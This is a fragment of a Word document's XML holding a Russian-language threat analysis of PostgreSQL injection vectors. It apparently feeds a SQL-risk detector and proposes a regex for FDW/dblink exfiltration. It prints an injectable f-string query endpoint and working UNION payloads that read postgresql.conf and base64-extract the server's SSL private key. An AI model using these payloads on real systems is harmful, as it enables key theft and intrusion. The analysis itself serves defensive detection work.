      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL log от backend-процессов — типичный артефакт port scan.</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (фактически 9.3 – 17, поведение не менялось).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на AWS RDS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preinstalled,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имеет USAGE; egress в IMDS зависит от VPC-конфига и hop-limit; на Google Cloud SQL — preinstalled, USAGE даётся через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egress на link-local закрыт; на Supabase — extension отключён по умолчанию, включается owner-ом проекта. Детальный разбор — см.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3.6.1</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как параллельный OOB-канал с другой моделью привилегий (PUBLIC после установки extension vs superuser-only для FDW). Если в кластере есть оба — атакующий использует тот, что доступен под текущей ролью.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3.6.3, 3.6.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — file-read через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как альтернативный OOB-вектор.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3.7.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE: загруженные cloud metadata IAM-credentials можно использовать для эскалации в cloud-side; локальный chain через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> если у роли есть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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — privilege escalation: пути получения USAGE ON FDW для non-superuser (наследование от admin-роли, цепочки через SECURITY DEFINER).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SERVER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FOREIGN TABLE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USER MAPPING</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app/services/judge/rules.py</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расширить класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (предложенный в 3.6.1) regex-ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b(CREATE\s+SERVER|CREATE\s+USER\s+MAPPING|CREATE\s+FOREIGN\s+TABLE|postgres_fdw)\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — добавить как вторую ветку в ту же regex-проверку, что и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы получить единый detector по всем OOB-векторам категории 3.6. Базовый риск 9.</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postgres_fdw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CREATE SERVER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CREATE FOREIGN TABLE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CREATE USER MAPPING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DO — Execute anonymous code block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PL/pgSQL EXECUTE с format()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ibreak.software: «Using SQL injection to perform SSRF/XSPA attacks»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R2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postgres_fdw / SSRF section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AWS: Use IMDSv2 (метаданные с header-protection)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SQLi cheat sheet — PostgreSQL section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RFC 1035, §2.3.1: Preferred name syntax — label charset &amp; length limit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6.3 pg_read_file и pg_read_server_files — file-read из SQL</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pg_read_binary_file()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> читают файлы напрямую через ОС-API под uid backend-процесса PostgreSQL. Результат возвращается прямо из функции — отдельного канала эксфильтрации не нужно, достаточно классической UNION-инъекции в любой SELECT-эндпоинт.</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app/api/v1/products.py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@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_products(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    category: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f"SELECT id, name, price FROM products WHERE category = '{category}'"</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category</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую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три колонки в SELECT (int, text, numeric). Для UNION-инъекции атакующему достаточно подобрать совместимые типы —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возвращает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что идеально подходит в колонку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A — PG_VERSION (относительный путь, без специальных прав)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload, работающий с привилегиями обычной application-роли. Путь без ведущего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интерпретируется относительно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL-кластера. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — однострочный файл с major-версией кластера, всегда присутствует в data_dir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `category`):</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pg_read_file('PG_VERSION'), 0 --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name, price FROM products WHERE category = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, pg_read_file('PG_VERSION'), 0 --'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HTTP-ответа атакующий получает строку вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"16\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — мажорная версия PG. По ней — карта применимых CVE из раздела 4 и понимание, какие следующие payload-ы доступны.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — postgresql.conf через offset/length (chunked)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Большие файлы читаются кусками через трёхаргументную сигнатуру </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_file(path, offset, length)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Полезно когда: (а) HTTP-response имеет лимит на размер; (б) WAF блокирует крупные UNION-ответы; (в) нужно итеративно перебрать содержимое не нагружая один ответ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `category`):</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pg_read_file('/etc/postgresql/16/main/postgresql.conf', 0, 50000), 0 --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name, price FROM products WHERE category = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, pg_read_file(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    '/etc/postgresql/16/main/postgresql.conf', 0, 50000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), 0 --'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 содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (до 50 KB). Что это даёт атакующему:</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listen_addresses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port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — карта сетевых интерфейсов кластера.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ssl_cert_file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ssl_key_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точные пути к SSL-сертификатам и приватному ключу (→ цель для Payload C).</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hba_file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ident_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пути к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pg_ident.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (следующий пивот: чтение auth-конфигурации).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log_directory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log_filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — расположение логов (потенциальный источник запросов других пользователей, паролей в plaintext если включён </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_min_messages=DEBUG</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data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если переопределён) — точная локация для следующих относительных-путь payload-ов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для файлов &gt;50 KB — повторять с увеличивающимся offset: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_file('...', 50000, 50000)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 100000, 50000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и т.д. Путь приведён для Debian/Ubuntu-style инсталляций; для RHEL/CentOS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/pgsql/16/data/postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, адаптировать по дистрибуции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — pg_read_binary_file для SSL-ключа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для не-текстовых файлов (бинарные, файлы с NUL-байтами, файлы в произвольной кодировке)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ломается на первом NUL — возвращает только префикс до первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00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pg_read_binary_file()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает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что обрабатывает любые байты. Для транспорта в HTTP-response — обернуть в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">encode(..., 'base64')</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Payload (подставляется вместо `category`):</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encode(pg_read_binary_file('/etc/ssl/private/server.key'), 'base64'), 0 --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name, price FROM products WHERE category = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, encode(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    pg_read_binary_file('/etc/ssl/private/server.key'), 'base64'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), 0 --'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 base64-encoded приватный ключ SSL-сертификата кластера. Эффект — компрометация ключа целиком: атакующий может (а) расшифровать ранее перехваченные TLS-дампы трафика клиент↔PG (если cipher не PFS); (б) поднять MITM-сервер с этим сертификатом — клиенты подключатся не заметив подмены; (в) если ключ переиспользован для других сервисов (типично в legacy-инфре) — pivot за пределы PG.</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Четыре под-цели file-read, у каждой своя применимость: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Direct file-read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержимое произвольных файлов с правами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Linux: обычно uid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres:postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, доступ к собственным файлам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0640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0600</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data_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) + к любым world-readable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0644</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
